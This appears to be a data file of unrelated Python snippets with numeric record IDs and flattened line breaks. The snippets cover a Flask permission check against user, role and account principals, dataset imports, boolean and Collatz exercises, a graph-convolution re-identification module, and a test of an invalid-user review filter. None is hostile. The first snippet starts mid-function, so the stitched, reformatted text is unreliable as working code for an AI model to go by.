PRINCIPALS_TYPE = acl.get(permission, []) current_app.logger.debug( f"Looking for {permission}-permission on {context} ... Principals: {principals}" ) # check access if not user_has_admin_access( current_user, permission ) and not user_matches_principals(current_user, principals): raise Forbidden( f"Authorization failure (accessing {context} to {permission}) ― cannot match {current_user} against {principals}!" ) def user_has_admin_access(user, permission: str) -> bool: if user.has_role(ADMIN_ROLE) or ( user.has_role(ADMIN_READER_ROLE) and permission == "read" ): return True return False def user_matches_principals(user, principals: PRINCIPALS_TYPE) -> bool: """ Tests if the user matches all passed principals. Returns False if no principals are passed. """ if not isinstance(principals, list): principals = [principals] # now we handle a list of str or Tuple[str] for matchable_principals in principals: if isinstance(matchable_principals, str): matchable_principals = ( matchable_principals, ) # now we handle only Tuple[str] if EVERY_LOGGED_IN_USER in matchable_principals: return True if user is not None and all( [ ( check_user_identity(user, principal) or check_user_role(user, principal) or check_account_membership(user, principal) or check_account_role(user, principal) ) for principal in matchable_principals ] ): return True return False def check_user_identity(user, principal: str) -> bool: if principal.startswith("user:"): user_id = principal.split("user:")[1] if not user_id.isdigit(): current_app.logger.warning( f"Cannot match principal for user ID {user_id} ― no digit." ) elif user.id == int(user_id): return True return False def check_user_role(user, principal: str) -> bool: if principal.startswith("role:"): user_role = principal.split("role:")[1] if user.has_role(user_role): return True return False def check_account_membership(user, principal: str) -> bool: if principal.startswith("account:"): account_id = principal.split("account:")[1] if not account_id.isdigit(): current_app.logger.warning( f"Cannot match principal for account ID {account_id} ― no digit." ) elif user.account.id == int(account_id): return True return False def check_account_role(user, principal: str) -> bool: if principal.startswith("account-role:"): account_role = principal.split("account-role:")[1] if user.account.has_role(account_role): return True return False
11590489
from .preprocess_dataset import PreprocessDataset from .intra_speaker_dataset import IntraSpeakerDataset, collate_batch from .utils import *
11590520
p = True q = True not (p or not q) # False p = True q = False not (p or not q) p = False q = True not (p or not q) p = False q = False not (p or not q) # False False True False def nand(bool1, bool2): """ Take two Boolean values bool1 and bool2 and return the specified Boolean values """ if bool1: if bool2: return False else: return True else: return True def f(x): if x%2==0: return x//2 else: return ((x*3)+1) f(f(f(f(f(f(f(674))))))) f(f(f(f(f(f(f(f(f(f(f(f(f(f(1071))))))))))))))
11590524
import numpy as np import torch import torch.nn as nn from .GraphConvNet import GraphConvNet class HOReIDGraphConvNet(nn.Module): def __init__(self, cfg): super(HOReIDGraphConvNet, self).__init__() self.cfg = cfg self.device = cfg.device self.branch_num = cfg.keypoints_model.branch_num self.linked_edges = \ [[13, 0], [13, 1], [13, 2], [13, 3], [13, 4], [13, 5], [13, 6], [13, 7], [13, 8], [13, 9], [13, 10], [13, 11], [13, 12], # global [0, 1], [0, 2], # head [1, 2], [1, 7], [2, 8], [7, 8], [1, 8], [2, 7], # body [1, 3], [3, 5], [2, 4], [4, 6], [7, 9], [9, 11], [8, 10], [10, 12], # libs # [3,4],[5,6],[9,10],[11,12], # semmetric libs links ] self.scale = cfg.model.gcn.scale # [[0. 1. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.] # [1. 0. 1. 1. 0. 0. 0. 1. 1. 0. 0. 0. 0. 1.] # [1. 1. 0. 0. 1. 0. 0. 1. 1. 0. 0. 0. 0. 1.] # [0. 1. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 1.] # [0. 0. 1. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 1.] # [0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.] # [0. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 1.] # [0. 1. 1. 0. 0. 0. 0. 0. 1. 1. 0. 0. 0. 1.] # [0. 1. 1. 0. 0. 0. 0. 1. 0. 0. 1. 0. 0. 1.] # [0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1. 0. 1.] # [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1. 1.] # [0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1.] # [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 1.] # [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]] self.adj = self.generate_adj(self.branch_num, self.linked_edges, self_connect=0.0).to(self.device) self.gcn = GraphConvNet(adj=self.adj, in_dim=2048, hidden_dim=2048, out_dim=2048, scale=self.scale).to(self.device) @staticmethod def generate_adj(node_num, lined_edges, self_connect=1): """ :param node_num: node number :param lined_edges: [[from_where, to_where], ...] :param self_connect: :return: """ if self_connect > 0: adj = np.eye(node_num) * self_connect else: # adj = np.zeros([node_num, node_num]) adj = np.zeros([node_num] * 2) for i, j in lined_edges: adj[i, j] = 1.0 adj[j, i] = 1.0 # print(adj) # we suppose the last one is global feature # [1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 0.] --> # [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.] adj[-1, :-1] = 0 adj[-1, -1] = 1 # print(adj) adj = torch.from_numpy(adj.astype(np.float32)) return adj def __call__(self, out_dict): out_dict['gcned_feat_vec_list'] = self.gcn(out_dict['feat_vec_list']) out_dict['adj'] = self.adj return out_dict
11590574
INVALID_USER_ID = 0 with frontend.signin("alice"): frontend.operation( "addreviewfilters", data={ "review_id": 1, "filters": [{ "type": "watcher", "user_ids": [INVALID_USER_ID], "paths": ["/"] }] }, expect={ "status": "failure", "code": "invaliduserid" })